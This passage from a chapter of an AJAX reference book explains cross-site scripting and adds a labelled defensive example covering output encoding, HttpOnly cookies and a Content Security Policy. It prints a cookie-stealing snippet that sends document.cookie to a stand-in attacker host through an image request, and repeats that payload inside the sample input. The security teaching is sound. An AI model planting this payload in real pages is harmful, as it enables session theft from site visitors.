AJAX - The Complete Reference


PART II


Chapter 7: Security Concerns


If the post goes through as is, then when you come along and view it, your cookie for that
particular site is displayed in an alert dialog. When this scenario happens for real, your
cookies most likely are not going to be alerted. Instead, they are going to be transmitted to
some other site using an image request or something similar, like so:

var cookieMonster = new Image();
cookieMonster.src = 'http://www.evilsite.com/cookiecollecter.php?stolencookie=' + escape(document.cookie);

The whole process of XSS and how it might be used is shown in Figure 7-8.
If you would like to see XSS in action safely, you can use the example at
http://unsecure.ajaxref.com/ch7/insecureblog.php; it's also shown in Figure 7-9 in case you
are hesitant to use the example. The provided example can be used as a sandbox for
your own XSS experiments. It has a preset cookie alert showing you that XSS does indeed
work here.
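
The defensive side of this scenario, as an added example that is not from the book: a blog that output-encodes each post renders the cookie-sending snippet shown above as inert text, and its response headers keep the session cookie out of document.cookie and block image requests to other origins. The names renderPost, responseHeaders and samplePost are hypothetical, and the sample post is constructed.

```javascript
// Added example (not from the book): output-encode untrusted blog posts
// so markup in them is displayed as text instead of being executed.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Encode the five characters that can start or break out of HTML markup
// in element-content and quoted-attribute contexts (single pass, so no
// double encoding of the ampersands it emits).
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Hypothetical renderer for one blog post; both fields are user-supplied.
function renderPost(post) {
  return '<div class="post">' +
    '<h3 title="' + escapeHtml(post.author) + '">' + escapeHtml(post.author) + '</h3>' +
    '<p>' + escapeHtml(post.body) + '</p>' +
    '</div>';
}

// Headers that limit the damage if an encoding step is ever missed:
// HttpOnly removes the session cookie from document.cookie, and the CSP
// refuses inline script and image loads from any other origin.
function responseHeaders(sessionId) {
  return {
    'Set-Cookie': 'session=' + encodeURIComponent(sessionId) +
      '; HttpOnly; Secure; SameSite=Lax; Path=/',
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; img-src 'self'",
  };
}

// Constructed sample input: the snippet from the text inside a script tag.
const samplePost = {
  author: 'Pat "the cat" O\'Brien & co',
  body: "<script>var cookieMonster = new Image(); cookieMonster.src=" +
    "'http://www.evilsite.com/cookiecollecter.php?stolencookie='" +
    "+escape(document.cookie);</script>",
};

console.log(renderPost(samplePost));
console.log(responseHeaders('constructed-session-id'));
```

Encoding at output time is the primary control; the two headers are a second layer for the case where one template forgets to call it.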

FIGURE 7-8 XSS overview